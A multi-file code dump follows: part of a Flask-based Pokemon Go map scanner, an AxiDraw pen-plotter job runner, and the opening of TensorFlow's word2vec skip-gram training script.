    parser.add_argument("-L", "--locale",
                        help="Locale for Pokemon names: default en, check locale folder for more options",
                        default="en")
    parser.add_argument("-ol", "--onlylure", help='Display only lured pokéstop',
                        action='store_true')
    parser.add_argument('-c', '--china', help='Coordinates transformer for China',
                        action='store_true')
    parser.add_argument("-pm", "--ampm_clock",
                        help="Toggles the AM/PM clock for Pokemon timers",
                        action='store_true', default=False)
    parser.add_argument('-d', '--debug', help='Debug Mode', action='store_true')
    parser.set_defaults(DEBUG=True)
    return parser.parse_args()
@memoize
def login(args):
    """Authenticate and fetch the player profile (memoized: only the first
    call hits the network). Prompts for the password when none was given
    on the command line.

    Returns (api_endpoint, access_token, profile_response); raises on a
    failed login or unreachable RPC server.
    """
    global global_password
    if not global_password:
        if args.password:
            global_password = args.password
        else:
            global_password = getpass.getpass()
    access_token = get_token(args.auth_service, args.username, global_password)
    if access_token is None:
        raise Exception('[-] Wrong username/password')
    print '[+] RPC Session Token: {} ...'.format(access_token[:25])
    api_endpoint = get_api_endpoint(args.auth_service, access_token)
    if api_endpoint is None:
        raise Exception('[-] RPC server offline')
    print '[+] Received API endpoint: {}'.format(api_endpoint)
    profile_response = retrying_get_profile(args.auth_service, access_token,
                                            api_endpoint, None)
    if profile_response is None or not profile_response.payload:
        raise Exception('Could not get profile')
    print '[+] Login successful'
    payload = profile_response.payload[0]
    profile = pokemon_pb2.ResponseEnvelop.ProfilePayload()
    profile.ParseFromString(payload)
    print '[+] Username: {}'.format(profile.profile.username)
    # creation_time is a millisecond epoch timestamp.
    creation_time = \
        datetime.fromtimestamp(int(profile.profile.creation_time)
                               / 1000)
    print '[+] You started playing Pokemon Go on: {}'.format(
        creation_time.strftime('%Y-%m-%d %H:%M:%S'))
    for curr in profile.profile.currency:
        print '[+] {}: {}'.format(curr.type, curr.amount)
    return api_endpoint, access_token, profile_response
def main():
    """Command-line entry point: parse args, log in, then walk a square
    spiral of scan steps around the origin, processing each step, before
    handing control to the background search thread."""
    full_path = os.path.realpath(__file__)
    (path, filename) = os.path.split(full_path)
    args = get_args()
    if args.auth_service not in ['ptc', 'google']:
        print '[!] Invalid Auth service specified'
        return
    print('[+] Locale is ' + args.locale)
    pokemonsJSON = json.load(
        open(path + '/locales/pokemon.' + args.locale + '.json'))
    if args.debug:
        global DEBUG
        DEBUG = True
        print '[!] DEBUG mode on'
    # only get location for first run
    if not (FLOAT_LAT and FLOAT_LONG):
        print('[+] Getting initial location')
        retrying_set_location(args.location)
    if args.auto_refresh:
        global auto_refresh
        auto_refresh = int(args.auto_refresh) * 1000  # seconds -> ms
    if args.ampm_clock:
        global is_ampm_clock
        is_ampm_clock = True
    api_endpoint, access_token, profile_response = login(args)
    clear_stale_pokemons()
    steplimit = int(args.step_limit)
    # Pokemon name/id filters (mutually exclusive on the command line).
    ignore = []
    only = []
    if args.ignore:
        ignore = [i.lower().strip() for i in args.ignore.split(',')]
    elif args.only:
        only = [i.lower().strip() for i in args.only.split(',')]
    # Square-spiral walk state: position (x, y) and direction (dx, dy).
    pos = 1
    x = 0
    y = 0
    dx = 0
    dy = -1
    steplimit2 = steplimit**2
    for step in range(steplimit2):
        #starting at 0 index
        debug('looping: step {} of {}'.format((step+1), steplimit**2))
        #debug('steplimit: {} x: {} y: {} pos: {} dx: {} dy {}'.format(steplimit2, x, y, pos, dx, dy))
        # Scan location math
        if -steplimit2 / 2 < x <= steplimit2 / 2 and -steplimit2 / 2 < y <= steplimit2 / 2:
            set_location_coords(x * 0.0025 + origin_lat, y * 0.0025 + origin_lon, 0)
        if x == y or x < 0 and x == -y or x > 0 and x == 1 - y:
            # corner of the spiral reached: rotate direction 90 degrees
            (dx, dy) = (-dy, dx)
        (x, y) = (x + dx, y + dy)
        process_step(args, api_endpoint, access_token, profile_response,
                     pokemonsJSON, ignore, only)
        print('Completed: ' + str(
            ((step+1) + pos * .25 - .25) / (steplimit2) * 100) + '%')
    global NEXT_LAT, NEXT_LONG
    if (NEXT_LAT and NEXT_LONG and
            (NEXT_LAT != FLOAT_LAT or NEXT_LONG != FLOAT_LONG)):
        print('Update to next location %f, %f' % (NEXT_LAT, NEXT_LONG))
        set_location_coords(NEXT_LAT, NEXT_LONG, 0)
        NEXT_LAT = 0
        NEXT_LONG = 0
    else:
        # No jump requested: return to the sweep origin for the next pass.
        set_location_coords(origin_lat, origin_lon, 0)
    register_background_thread()
def process_step(args, api_endpoint, access_token, profile_response,
                 pokemonsJSON, ignore, only):
    """Scan the area around the current global position (FLOAT_LAT/FLOAT_LONG).

    Sends a heartbeat for the level-15 S2 cell at the current position and
    for each of its child cells, then records what was seen into the
    module-level dicts: wild pokemon into `pokemons`, gyms into `gyms`,
    pokestops into `pokestops`.

    :param args: parsed CLI args (uses auth_service, china, display_gym,
        display_pokestop, onlylure, ignore, only)
    :param api_endpoint: API URL returned by login()
    :param access_token: auth token returned by login()
    :param profile_response: profile payload returned by login()
    :param pokemonsJSON: pokemon-id (str) -> localized name mapping
    :param ignore: lower-cased names/ids to skip (used when args.ignore set)
    :param only: lower-cased names/ids to keep exclusively (args.only set)
    """
    print('[+] Searching for Pokemon at location {} {}'.format(FLOAT_LAT, FLOAT_LONG))
    origin = LatLng.from_degrees(FLOAT_LAT, FLOAT_LONG)
    step_lat = FLOAT_LAT
    step_long = FLOAT_LONG
    # Level-15 S2 cell that contains the current position.
    parent = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
                                                     FLOAT_LONG)).parent(15)
    h = get_heartbeat(args.auth_service, api_endpoint, access_token,
                      profile_response)
    hs = [h]
    seen = {}  # SpawnPointId -> TimeTillHiddenMs of the sighting we kept
    # Query every child cell. set_location_coords mutates the global
    # position, so it is restored to (step_lat, step_long) afterwards.
    for child in parent.children():
        latlng = LatLng.from_point(Cell(child).get_center())
        set_location_coords(latlng.lat().degrees, latlng.lng().degrees, 0)
        hs.append(
            get_heartbeat(args.auth_service, api_endpoint, access_token,
                          profile_response))
    set_location_coords(step_lat, step_long, 0)
    visible = []
    for hh in hs:
        try:
            for cell in hh.cells:
                for wild in cell.WildPokemon:
                    hash = wild.SpawnPointId;
                    # NOTE(review): seen[hash] stores an int, so for a repeat
                    # spawn point `seen[hash].TimeTillHiddenMs` raises
                    # AttributeError, which the except below swallows and
                    # aborts this heartbeat. Looks like a bug — confirm.
                    if hash not in seen.keys() or (seen[hash].TimeTillHiddenMs <= wild.TimeTillHiddenMs):
                        visible.append(wild)
                        seen[hash] = wild.TimeTillHiddenMs
                if cell.Fort:
                    for Fort in cell.Fort:
                        if Fort.Enabled == True:
                            if args.china:
                                # Chinese maps use the GCJ-02 datum.
                                (Fort.Latitude, Fort.Longitude) = \
                                    transform_from_wgs_to_gcj(Location(Fort.Latitude, Fort.Longitude))
                            if Fort.GymPoints and args.display_gym:
                                gyms[Fort.FortId] = [Fort.Team, Fort.Latitude,
                                                     Fort.Longitude, Fort.GymPoints]
                            elif Fort.FortType \
                                    and args.display_pokestop:
                                # expire_time stays 0 unless the stop is lured.
                                expire_time = 0
                                if Fort.LureInfo.LureExpiresTimestampMs:
                                    expire_time = datetime\
                                        .fromtimestamp(Fort.LureInfo.LureExpiresTimestampMs / 1000.0)\
                                        .strftime("%H:%M:%S")
                                if (expire_time != 0 or not args.onlylure):
                                    pokestops[Fort.FortId] = [Fort.Latitude,
                                                              Fort.Longitude, expire_time]
        except AttributeError:
            # Heartbeat payloads without the expected fields are skipped.
            break
    for poke in visible:
        pokeid = str(poke.pokemon.PokemonId)
        pokename = pokemonsJSON[pokeid]
        # Honour the --ignore / --only filters (matched by name or id).
        if args.ignore:
            if pokename.lower() in ignore or pokeid in ignore:
                continue
        elif args.only:
            if pokename.lower() not in only and pokeid not in only:
                continue
        disappear_timestamp = time.time() + poke.TimeTillHiddenMs \
            / 1000
        if args.china:
            (poke.Latitude, poke.Longitude) = \
                transform_from_wgs_to_gcj(Location(poke.Latitude,
                                                   poke.Longitude))
        pokemons[poke.SpawnPointId] = {
            "lat": poke.Latitude,
            "lng": poke.Longitude,
            "disappear_time": disappear_timestamp,
            "id": poke.pokemon.PokemonId,
            "name": pokename
        }
def clear_stale_pokemons():
    """Drop pokemon whose disappear_time has passed from the global `pokemons`."""
    current_time = time.time()
    # Iterate over a snapshot of the keys: deleting entries while iterating
    # the live key view raises RuntimeError on Python 3 (on Python 2 .keys()
    # happened to return a list, which is why this "worked" before).
    for pokemon_key in list(pokemons.keys()):
        pokemon = pokemons[pokemon_key]
        if current_time > pokemon['disappear_time']:
            # Parenthesized so the statement is valid on both Python 2 and 3.
            print("[+] removing stale pokemon %s at %f, %f from list" % (
                pokemon['name'].encode('utf-8'), pokemon['lat'], pokemon['lng']))
            del pokemons[pokemon_key]
def register_background_thread(initial_registration=False):
    """
    Start a background thread to search for Pokemon
    while Flask is still able to serve requests for the map
    :param initial_registration: True if first registration and thread should start immediately, False if it's being called by the finishing thread to schedule a refresh
    :return: None
    """
    global search_thread
    debug('register_background_thread called')
    if not initial_registration:
        # A finished scan re-schedules itself after a short delay.
        debug('register_background_thread: queueing')
        search_thread = threading.Timer(30, main)  # delay, in seconds
    else:
        if not werkzeug.serving.is_running_from_reloader():
            debug(
                'register_background_thread: not running inside Flask so not starting thread')
            return
        if search_thread:
            debug(
                'register_background_thread: initial registration requested but thread already running')
            return
        debug('register_background_thread: initial registration')
        search_thread = threading.Thread(target=main)
    search_thread.daemon = True
    search_thread.name = 'search_thread'
    search_thread.start()
def create_app():
    """Build the Flask application and attach the Google Maps extension."""
    flask_app = Flask(__name__, template_folder='templates')
    GoogleMaps(flask_app, key=GOOGLEMAPS_KEY)
    return flask_app
# Module-level Flask app so the @app.route decorators below can register.
app = create_app()
@app.route('/data')
def data():
    """ Gets all the PokeMarkers via REST """
    markers = get_pokemarkers()
    return json.dumps(markers)
@app.route('/raw_data')
def raw_data():
    """ Gets raw data for pokemons/gyms/pokestops via REST """
    return flask.jsonify(
        pokemons=pokemons,
        gyms=gyms,
        pokestops=pokestops,
    )
@app.route('/config')
def config():
    """ Gets the settings for the Google Maps via REST"""
    center = dict(
        lat=FLOAT_LAT,
        lng=FLOAT_LONG,
        zoom=15,
        identifier="fullmap",
    )
    return json.dumps(center)
@app.route('/')
def fullmap():
    """Render the full-screen map page, dropping expired pokemon first."""
    clear_stale_pokemons()
    return render_template(
        'example_fullmap.html',
        key=GOOGLEMAPS_KEY,
        fullmap=get_map(),
        auto_refresh=auto_refresh,
    )
@app.route('/next_loc')
def next_loc():
    """REST endpoint that stores the next scan location.

    Expects `lat` and `lon` query parameters; the scan loop picks the new
    coordinates up through the NEXT_LAT/NEXT_LONG globals.

    :return: 'ok' (always, to keep the original interface)
    """
    global NEXT_LAT, NEXT_LONG
    lat = flask.request.args.get('lat', '')
    lon = flask.request.args.get('lon', '')
    if not (lat and lon):
        print('[-] Invalid next location: %s,%s' % (lat, lon))
    else:
        try:
            # Parse before assigning so a bad value leaves both globals untouched.
            parsed_lat = float(lat)
            parsed_lon = float(lon)
        except ValueError:
            # Previously a non-numeric value crashed the request with an
            # unhandled ValueError (HTTP 500).
            print('[-] Invalid next location: %s,%s' % (lat, lon))
        else:
            print('[+] Saved next location as %s,%s' % (lat, lon))
            NEXT_LAT = parsed_lat
            NEXT_LONG = parsed_lon
    return 'ok'
def get_pokemarkers():
    """Build the marker list for the frontend map.

    Emits one marker for the start position, then one per entry of the
    module-level `pokemons`, `gyms` and `pokestops` dicts.

    :return: list of marker dicts understood by the frontend.
    """
    pokeMarkers = [{
        'icon': icons.dots.red,
        'lat': origin_lat,
        'lng': origin_lon,
        'infobox': "Start position",
        'type': 'custom',
        'key': 'start-position',
        'disappear_time': -1
    }]
    for pokemon_key in pokemons:
        pokemon = pokemons[pokemon_key]
        datestr = datetime.fromtimestamp(pokemon[
            'disappear_time'])
        dateoutput = datestr.strftime("%H:%M:%S")
        if is_ampm_clock:
            dateoutput = datestr.strftime("%I:%M%p").lstrip('0')
        pokemon['disappear_time_formatted'] = dateoutput
        LABEL_TMPL = u'''
<div><b>{name}</b><span> - </span><small><a href='http://www.pokemon.com/us/pokedex/{id}' target='_blank' title='View in Pokedex'>#{id}</a></small></div>
<div>Disappears at - {disappear_time_formatted} <span class='label-countdown' disappears-at='{disappear_time}'></span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
'''
        label = LABEL_TMPL.format(**pokemon)
        # NOTE: `infobox` field doesn't render multiple line string in frontend
        label = label.replace('\n', '')
        pokeMarkers.append({
            'type': 'pokemon',
            'key': pokemon_key,
            'disappear_time': pokemon['disappear_time'],
            'icon': 'static/icons/%d.png' % pokemon["id"],
            'lat': pokemon["lat"],
            'lng': pokemon["lng"],
            'infobox': label
        })
    # Team id -> infobox colour. Previously an if-chain that left `color`
    # undefined (NameError) for any team id outside 0-3; unknown teams now
    # fall back to the neutral colour.
    team_colors = {
        0: "rgba(0,0,0,.4)",
        1: "rgba(74, 138, 202, .6)",
        2: "rgba(240, 68, 58, .6)",
        3: "rgba(254, 217, 40, .6)",
    }
    for gym_key in gyms:
        gym = gyms[gym_key]
        color = team_colors.get(gym[0], team_colors[0])
        icon = 'static/forts/'+numbertoteam[gym[0]]+'_large.png'
        pokeMarkers.append({
            'icon': 'static/forts/' + numbertoteam[gym[0]] + '.png',
            'type': 'gym',
            'key': gym_key,
            'disappear_time': -1,
            'lat': gym[1],
            'lng': gym[2],
            'infobox': "<div><center><small>Gym owned by:</small><br><b style='color:" + color + "'>Team " + numbertoteam[gym[0]] + "</b><br><img id='" + numbertoteam[gym[0]] + "' height='100px' src='"+icon+"'><br>Prestige: " + str(gym[3]) + "</center>"
        })
    for stop_key in pokestops:
        stop = pokestops[stop_key]
        # stop[2] is either 0 (no lure) or a non-empty "%H:%M:%S" string, so a
        # truthiness test is equivalent to the old `stop[2] > 0` without the
        # str-vs-int comparison that raises TypeError on Python 3.
        if stop[2]:
            pokeMarkers.append({
                'type': 'lured_stop',
                'key': stop_key,
                'disappear_time': -1,
                'icon': 'static/forts/PstopLured.png',
                'lat': stop[0],
                'lng': stop[1],
                'infobox': 'Lured Pokestop, expires at ' + stop[2],
            })
        else:
            pokeMarkers.append({
                'type': 'stop',
                'key': stop_key,
                'disappear_time': -1,
                'icon': 'static/forts/Pstop.png',
                'lat': stop[0],
                'lng': stop[1],
                'infobox': 'Pokestop',
            })
    return pokeMarkers
def get_map():
    """Assemble the full-screen Map object centred on the scan origin."""
    map_style = ('height:100%;width:100%;top:0;left:0;'
                 'position:absolute;z-index:200;')
    return Map(
        identifier="fullmap2",
        style=map_style,
        lat=origin_lat,
        lng=origin_lon,
        markers=get_pokemarkers(),
        zoom='15',
    )
if __name__ == '__main__':
    # Parse CLI args, kick off the background search thread, then serve the map.
    args = get_args()
    register_background_thread(initial_registration=True)
    app.run(debug=True, threaded=True, host=args.host, port=args.port)
|
axirunner.py |
from os import kill
import time
import signal
import atexit
import logging
from queue import Queue
from typing import NoReturn
from multiprocessing import Process, Event
from multiprocessing import Queue as pQueue
from multiprocessing.connection import Connection
from AxiFresco.axifresco import Axifresco, Point, json_to_shapes, draw, Status
# Shared state between the request handlers and the drawing worker process.
axi_thread = None  # multiprocessing.Process running axidraw_runner, or None
PAUSE = Event()    # set -> the drawing loop pauses
ABORT = Event()    # set -> the current drawing is aborted
draw_q = pQueue()  # queue of pending drawing jobs
class RequestTypes:
    """String constants naming the request types the server dispatches on."""
    draw: str = 'draw'
    stop: str = 'stop'
    pause_resume: str = 'pause'
    reset: str = 'reset'
    home: str = 'home'
def is_axidraw_alive():
    """Return True when the axidraw worker process exists and is running."""
    if axi_thread is None:
        return False
    return axi_thread.is_alive()
def axidraw_runner(draw_q: pQueue, pause_event: Event, abort_event: Event, status_pipe: Connection):
    """Worker-process entry point: pull drawing jobs off the queue and plot them.

    Runs until the process is terminated; always tries to shut the axidraw
    down cleanly on the way out.

    :param draw_q: queue of job dicts with 'config' and 'drawing' keys
    :param pause_event: set to pause the current drawing
    :param abort_event: set to abort the current drawing
    :param status_pipe: pipe used to report state/progress to the server
    """
    # create the axidraw handler and set the resolution
    ax = Axifresco({}, resolution=20,
                   unsafe=True,
                   pause_event=pause_event,
                   abort_event=abort_event,
                   status_pipe=status_pipe)

    def exit_cleanly(*_signal_args):
        # *_signal_args: signal handlers are invoked as handler(signum, frame);
        # previously the zero-arg signature raised TypeError when a signal fired.
        logging.info('Shutting down the axidraw before exiting...')
        try:
            ax.close()
        except Exception as e:
            logging.error(f'Something wrong occured when trying to exit cleanly:\n{e}')

    # try exiting cleanly. Will most likely fail to do so because of
    # how the terminate instruction works.
    signal.signal(signal.SIGINT, exit_cleanly)
    signal.signal(signal.SIGTERM, exit_cleanly)
    atexit.register(exit_cleanly)

    try:
        while True:
            if ax.status == Status.STOPPED and draw_q.qsize() > 0:
                data = draw_q.get()
                status_pipe.send({
                    'state': Status.PLAYING,
                    'message': 'Starting a new drawing. Pre-processing shapes...',
                    'progress': 0
                })
                # process the data
                global_config = data['config']
                shapes = data['drawing']
                config = global_config['axidraw_options']
                spline_res = global_config['spline_res']
                margin = global_config['margin']
                optimize = global_config['optimize']
                # renamed from `format` so the builtin is not shadowed
                paper_format = global_config['format']
                activeLayers = global_config['layers']

                shapes, aspect_ratio = json_to_shapes(shapes)
                shapes = [s for s in shapes if s.layer in activeLayers]
                ax.set_format(Point(paper_format['x'], paper_format['y']))
                ax.set_config(config)
                ax.resolution = spline_res
                draw(shapes, aspect_ratio, ax, margin, optimize, preview=False)
            else:
                time.sleep(0.2)
    except Exception:
        # Previously a bare `except: pass` hid every failure; keep the
        # best-effort behaviour but log what killed the loop.
        logging.exception('axidraw runner loop terminated unexpectedly')
    finally:
        exit_cleanly()
def draw_request(data, status_pipe: Connection):
    """Queue a drawing job, spawning the worker process if none is running."""
    global axi_thread
    worker_dead = axi_thread is None or not axi_thread.is_alive()
    # Only create a new process if none is running
    if worker_dead:
        axi_thread = Process(
            target=axidraw_runner,
            args=(draw_q, PAUSE, ABORT, status_pipe,),
            daemon=True,
        )
        axi_thread.start()
    # hand the job over, then clear any stale pause/abort flags
    draw_q.put(data)
    PAUSE.clear()
    ABORT.clear()
def kill_axidraw(status_pipe: Connection):
    """Report the stopped state, then terminate the worker process."""
    stopped_status = {
        'state': Status.STOPPED,
        'message': 'Axidraw has been stopped. Press play to draw.',
        'progress': 0
    }
    status_pipe.send(stopped_status)
    axi_thread.terminate()
def stop_draw(data, status_pipe: Connection):
    """Stop the running drawing process and reset the axidraw hardware."""
    logging.info('Stopping axidraw...')
    global axi_thread
    if not is_axidraw_alive():
        logging.warning('The axidraw process is already stopped.')
        return
    kill_axidraw(status_pipe=status_pipe)
    # The terminated process rarely exits cleanly, so reset the hardware.
    reset_axidraw({}, status_pipe)
def pause_resume(data, status_pipe: Connection):
    """Toggle the PAUSE flag for the running drawing and report the new state.

    :param data: unused (kept for the dispatch-table signature)
    :param status_pipe: pipe used to report state to the server
    """
    if axi_thread is None or not axi_thread.is_alive():
        logging.warning('Cannot pause/resume draw as the axidraw thread is dead.')
        # Bug fix: previously execution fell through here and toggled the
        # pause flag / sent a bogus status although nothing was drawing.
        return
    if PAUSE.is_set():
        logging.info('Resuming draw...')
        PAUSE.clear()
        status_pipe.send({
            'state': Status.PLAYING,
            'message': 'Resuming draw...',
            'progress': 0
        })
    else:
        logging.info('Pausing draw...')
        PAUSE.set()
        status_pipe.send({
            'state': Status.PAUSED,
            'message': 'Axidraw paused. Press Play to resume or Home to send the draw head home.',
            'progress': 0
        })
def reset_axidraw(data, status_pipe: Connection):
    """Hard-reset the axidraw hardware, stopping any live worker first."""
    global axi_thread
    if is_axidraw_alive():
        logging.warning('Axidraw is not stopped. Stopping it first.')
        kill_axidraw(status_pipe=status_pipe)
        time.sleep(0.2)
    logging.info('Resetting the axidraw...')
    resetter = Axifresco(config={}, unsafe=True, reset=True)
    resetter.stop_motors()
    resetter.axidraw.disconnect()
    status_pipe.send({
        'state': Status.STOPPED,
        'message': 'Axidraw has been stopped. Press play to draw.',
        'progress': 0
    })
def go_home(data, status_pipe: Connection):
    """Abort a paused drawing and send the pen head back to its home position."""
    if not PAUSE.is_set():
        logging.error('Axidraw is not stopped. Can\'t send home')
        return
    logging.info('Aborting and sending axidraw home')
    ABORT.set()
    status_pipe.send({
        'state': Status.STOPPED,
        'message': 'Axidraw has been sent home. Press play to draw.',
        'progress': 0
    })
# Dispatch table: request type -> handler(data, status_pipe).
process_request = {
    RequestTypes.draw: draw_request,
    RequestTypes.stop: stop_draw,
    RequestTypes.pause_resume: pause_resume,
    RequestTypes.reset: reset_axidraw,
    RequestTypes.home: go_home,
}
def request_processor(q: Queue, status_pipe: Connection) -> NoReturn:
    """
    Process runner for the axidraw server

    Blocks on the request queue forever, dispatching each (request, data)
    pair through the process_request table.

    :param q: queue of (request_type, data) tuples
    :param status_pipe: pipe handed to every handler for status reporting
    """
    try:
        logging.info('Ready to boogie!')
        logging.info(q)
        while 1:
            request, data = q.get()
            try:
                process_request[request](data, status_pipe)
            except Exception as e:
                logging.error(f'Something went terribly wrong:\n{e}')
                raise e
            time.sleep(0.01)
    except KeyboardInterrupt:
        # Bug fix: stop_draw requires (data, status_pipe); the bare call
        # raised TypeError here and skipped the shutdown on Ctrl-C.
        stop_draw(None, status_pipe)
        exit(0)
|
word2vec_optimized.py | """Multi-threaded word2vec unbatched skip-gram model.
Trains the model described in:
(Mikolov, et. al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does true SGD (i.e. no minibatching). To do this efficiently, custom
ops are used to sequentially process data within a 'batch'.
The key ops used are:
* skipgram custom op that does input processing.
* neg_train custom op that efficiently calculates and applies the gradient using
true SGD.
"""
import os
import sys
import threading
import time
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
# Command-line flags controlling training data, model size and runtime
# behaviour (see the module docstring for usage).
flags = tf.app.flags

flags.DEFINE_string("save_path", None, "Directory to write the model.")
flags.DEFINE_string(
    "train_data", None,
    "Training data. E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
    "eval_data", None, "Analogy questions. "
    "https://word2vec.googlecode.com/svn/trunk/questions-words.txt.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
    "epochs_to_train", 15,
    "Number of epochs to train. Each epoch processes the training data once "
    "completely.")
flags.DEFINE_float("learning_rate", 0.025, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 25,
                     "Negative samples per training example.")
flags.DEFINE_integer("batch_size", 500,
                     "Numbers of training examples each step processes "
                     "(no minibatching).")
flags.DEFINE_integer("concurrent_steps", 12,
                     "The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
                     "The number of words to predict to the left and right "
                     "of the target word.")
flags.DEFINE_integer("min_count", 5,
                     "The minimum number of word occurrences for it to be "
                     "included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
                   "Subsample threshold for word occurrence. Words that appear "
                   "with higher frequency will be randomly down-sampled. Set "
                   "to 0 to disable.")
flags.DEFINE_boolean(
    "interactive", False,
    "If true, enters an IPython interactive session to play with the trained "
    "model. E.g., try model.analogy('france', 'paris', 'russia') and "
    "model.nearby(['proton', 'elephant', 'maxwell']")

# Parsed flag values, read throughout this module.
FLAGS = flags.FLAGS
class Options(object):
  """Options used by our word2vec model.

  A plain snapshot of the FLAGS values so the model does not read global
  flags directly.
  """

  def __init__(self):
    # Model options.

    # Embedding dimension.
    self.emb_dim = FLAGS.embedding_size

    # Training options.

    # The training text file.
    self.train_data = FLAGS.train_data

    # Number of negative samples per example.
    self.num_samples = FLAGS.num_neg_samples

    # The initial learning rate.
    self.learning_rate = FLAGS.learning_rate

    # Number of epochs to train. After these many epochs, the learning
    # rate decays linearly to zero and the training stops.
    self.epochs_to_train = FLAGS.epochs_to_train

    # Concurrent training steps.
    self.concurrent_steps = FLAGS.concurrent_steps

    # Number of examples for one training step.
    self.batch_size = FLAGS.batch_size

    # The number of words to predict to the left and right of the target word.
    self.window_size = FLAGS.window_size

    # The minimum number of word occurrences for it to be included in the
    # vocabulary.
    self.min_count = FLAGS.min_count

    # Subsampling threshold for word occurrence.
    self.subsample = FLAGS.subsample

    # Where to write out summaries.
    self.save_path = FLAGS.save_path

    # Eval options.

    # The text file for eval.
    self.eval_data = FLAGS.eval_data
class Word2Vec(object):
  """Word2Vec model (Skipgram).

  Builds the training and evaluation graphs in the given session and runs
  true-SGD training via the custom skipgram/neg_train ops.
  """

  def __init__(self, options, session):
    self._options = options
    self._session = session
    self._word2id = {}  # word string -> vocabulary id
    self._id2word = []  # vocabulary id -> word string
    self.build_graph()
    self.build_eval_graph()
    self.save_vocab()
    self._read_analogies()

  def _read_analogies(self):
    """Reads through the analogy question file.

    Returns:
      questions: a [n, 4] numpy array containing the analogy question's
        word ids.
      questions_skipped: questions skipped due to unknown words.
    """
    questions = []
    questions_skipped = 0
    with open(self._options.eval_data) as analogy_f:
      for line in analogy_f:
        if line.startswith(":"):  # Skip comments.
          continue
        words = line.strip().lower().split(" ")
        ids = [self._word2id.get(w.strip()) for w in words]
        # A question is usable only if all four words are in-vocabulary.
        if None in ids or len(ids) != 4:
          questions_skipped += 1
        else:
          questions.append(np.array(ids))
    print "Eval analogy file: ", self._options.eval_data
    print "Questions: ", len(questions)
    print "Skipped: ", questions_skipped
    self._analogy_questions = np.array(questions, dtype=np.int32)

  def build_graph(self):
    """Build the model graph."""
    opts = self._options

    # The training data. A text file.
    (words, counts, words_per_epoch, current_epoch, total_words_processed,
     examples, labels) = word2vec.skipgram(filename=opts.train_data,
                                           batch_size=opts.batch_size,
                                           window_size=opts.window_size,
                                           min_count=opts.min_count,
                                           subsample=opts.subsample)
    # Materialize the vocabulary tensors once so Python-side structures
    # (_id2word/_word2id) can be filled in.
    (opts.vocab_words, opts.vocab_counts,
     opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
    opts.vocab_size = len(opts.vocab_words)
    print "Data file: ", opts.train_data
    print "Vocab size: ", opts.vocab_size - 1, " + UNK"
    print "Words per epoch: ", opts.words_per_epoch

    self._id2word = opts.vocab_words
    for i, w in enumerate(self._id2word):
      self._word2id[w] = i

    # Declare all variables we need.
    # Input words embedding: [vocab_size, emb_dim]
    w_in = tf.Variable(
        tf.random_uniform(
            [opts.vocab_size,
             opts.emb_dim], -0.5 / opts.emb_dim, 0.5 / opts.emb_dim),
        name="w_in")

    # Output (context) embedding, zero-initialized: [vocab_size, emb_dim]
    w_out = tf.Variable(tf.zeros([opts.vocab_size, opts.emb_dim]), name="w_out")

    # Global step: []
    global_step = tf.Variable(0, name="global_step")

    # Linear learning rate decay (floored at 0.0001 * initial rate).
    words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
    lr = opts.learning_rate * tf.maximum(
        0.0001,
        1.0 - tf.cast(total_words_processed, tf.float32) / words_to_train)

    # Training nodes.
    inc = global_step.assign_add(1)
    with tf.control_dependencies([inc]):
      train = word2vec.neg_train(w_in,
                                 w_out,
                                 examples,
                                 labels,
                                 lr,
                                 vocab_count=opts.vocab_counts.tolist(),
                                 num_negative_samples=opts.num_samples)

    self._w_in = w_in
    self._examples = examples
    self._labels = labels
    self._lr = lr
    self._train = train
    self.step = global_step
    self._epoch = current_epoch
    self._words = total_words_processed

  def save_vocab(self):
    """Save the vocabulary to a file so the model can be reloaded."""
    opts = self._options
    with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
      for i in xrange(opts.vocab_size):
        f.write(opts.vocab_words[i] + " " + str(opts.vocab_counts[i]) + "\n")

  def build_eval_graph(self):
    """Build the evaluation graph."""
    # Eval graph
    opts = self._options

    # Each analogy task is to predict the 4th word (d) given three
    # words: a, b, c.  E.g., a=italy, b=rome, c=france, we should
    # predict d=paris.

    # The eval feeds three vectors of word ids for a, b, c, each of
    # which is of size N, where N is the number of analogies we want to
    # evaluate in one batch.
    analogy_a = tf.placeholder(dtype=tf.int32)  # [N]
    analogy_b = tf.placeholder(dtype=tf.int32)  # [N]
    analogy_c = tf.placeholder(dtype=tf.int32)  # [N]

    # Normalized word embeddings of shape [vocab_size, emb_dim].
    nemb = tf.nn.l2_normalize(self._w_in, 1)

    # Each row of a_emb, b_emb, c_emb is a word's embedding vector.
    # They all have the shape [N, emb_dim]
    a_emb = tf.gather(nemb, analogy_a)  # a's embs
    b_emb = tf.gather(nemb, analogy_b)  # b's embs
    c_emb = tf.gather(nemb, analogy_c)  # c's embs

    # We expect that d's embedding vectors on the unit hyper-sphere is
    # near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
    target = c_emb + (b_emb - a_emb)

    # Compute cosine distance between each pair of target and vocab.
    # dist has shape [N, vocab_size].
    dist = tf.matmul(target, nemb, transpose_b=True)

    # For each question (row in dist), find the top 4 words.
    _, pred_idx = tf.nn.top_k(dist, 4)

    # Nodes for computing neighbors for a given word according to
    # their cosine distance.
    nearby_word = tf.placeholder(dtype=tf.int32)  # word id
    nearby_emb = tf.gather(nemb, nearby_word)
    nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
    nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
                                         min(1000, opts.vocab_size))

    # Nodes in the construct graph which are used by training and
    # evaluation to run/feed/fetch.
    self._analogy_a = analogy_a
    self._analogy_b = analogy_b
    self._analogy_c = analogy_c
    self._analogy_pred_idx = pred_idx
    self._nearby_word = nearby_word
    self._nearby_val = nearby_val
    self._nearby_idx = nearby_idx

    # Properly initialize all variables.
    tf.initialize_all_variables().run()

    self.saver = tf.train.Saver()

  def _train_thread_body(self):
